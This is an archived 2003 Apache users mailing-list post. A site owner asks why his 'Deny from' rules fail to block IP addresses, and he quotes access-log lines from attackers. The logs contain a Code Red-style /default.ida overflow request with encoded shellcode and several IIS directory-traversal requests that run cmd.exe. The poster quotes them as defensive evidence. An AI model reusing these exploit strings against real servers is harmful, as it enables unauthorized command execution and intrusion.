You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Joseph A Nagy Jr <jo...@charter.net> on 2003/07/11 17:58:09 UTC
[users@httpd] Access Control
Refrence: http://joseph-a-nagy-jr.homelinux.org/manual/howto/auth.html
Okay. I've been using access control to block IP's for trying to break
my site:
24.158.107.12 - - [10/Jul/2003:11:11:31 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u909
0%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404
704 "-" "-"
The above is just one example of what my site is being hit with (at
least once a day that IP with that request is in my log file).
24.61.145.148 - - [11/Jul/2003:08:23:01 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HT
TP/1.0" 404 674 "-" "-"
24.61.145.148 - - [11/Jul/2003:08:23:50 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HT
TP/1.0" 404 671 "-" "-"
24.61.145.148 - - [11/Jul/2003:08:23:51 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 732 "-" "-"
24.61.145.148 - - [11/Jul/2003:08:24:01 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 696 "-"
"-"
24.61.145.148 - - [11/Jul/2003:08:24:04 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 672 "-"
"-"
Is another block of exmaples (my unrelated question is why the fuck am I
being hit with what looks like exploits for IIS and Windows?!).
Now here is my attempt at blocking those IP's:
<Directory />
Options All Multiviews
Order allow,deny
Allow from all
Deny from 24.158.220.23 24.61.145.148 24.158.107.12
</Directory>
I once had a friends IP address included, restarted apache, but my
friend was still able to access my site.
ip.address - - [10/Jul/2003:16:38:15 -0500] "GET / HTTP/1.1" 200 9673
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
"
ip.address - - [10/Jul/2003:16:38:17 -0500] "GET
/css/coolstyle-final.css HTTP/1.1" 200 2245
"http://joseph-a-nagy-jr.hom
elinux.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
ip.address - - [10/Jul/2003:16:38:19 -0500] "GET
/images/website/general-images/valid-xhtml10.png HTTP/1.1" 200 2414
"htt
p://joseph-a-nagy-jr.homelinux.org/" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
ip.address - - [10/Jul/2003:16:38:19 -0500] "GET
/images/website/general-images/vcss.png HTTP/1.1" 200 1134
"http://josep
h-a-nagy-jr.homelinux.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
98)"
ip.address - - [10/Jul/2003:16:38:21 -0500] "GET
/images/website/general-images/303014.gif HTTP/1.1" 200 4750
"http://jos
eph-a-nagy-jr.homelinux.org/" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
ip.address - - [10/Jul/2003:16:38:24 -0500] "GET
/images/icon/other/awstats_logo1.png HTTP/1.1" 200 2144
"http://joseph-a
-nagy-jr.homelinux.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
98)"
ip.address - - [10/Jul/2003:16:38:20 -0500] "GET
/images/family-photo/pictures-of-me/just-me/jnagyjr.jpg HTTP/1.1" 200
31
143 "http://joseph-a-nagy-jr.homelinux.org/" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows 98)"
ip.address - - [10/Jul/2003:16:38:29 -0500] "GET
/images/website/general-images/apache_pb.png HTTP/1.1" 200 2486
"http://
joseph-a-nagy-jr.homelinux.org/" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
ip.address - - [10/Jul/2003:16:38:29 -0500] "GET
/images/website/perl/sm_perl_id_313_bk.gif HTTP/1.1" 200 2373
"http://jo
seph-a-nagy-jr.homelinux.org/" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
ip.address - - [10/Jul/2003:16:38:31 -0500] "GET
/images/website/general-images/redhat-poweredby.png HTTP/1.1" 200 1579
"
http://joseph-a-nagy-jr.homelinux.org/" "Mozilla/4.0 (compatible; MSIE
6.0; Windows 98)"
ip.address - - [10/Jul/2003:16:39:14 -0500] "GET /music/ HTTP/1.1" 200
8589 "http://joseph-a-nagy-jr.homelinux.org/" "Moz
illa/4.0 (compatible; MSIE 6.0; Windows 98)"
what am I doing wrong?
--
Wielder of the mighty +1 LARTsaber of Unsubscribe Instructions At End of
Message, the +3 Clue-by-Four of No Attachments to a Mailing List, and
the -4 Shield of No Spell Checker
http://joseph-a-nagy-jr.homelinux.org
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org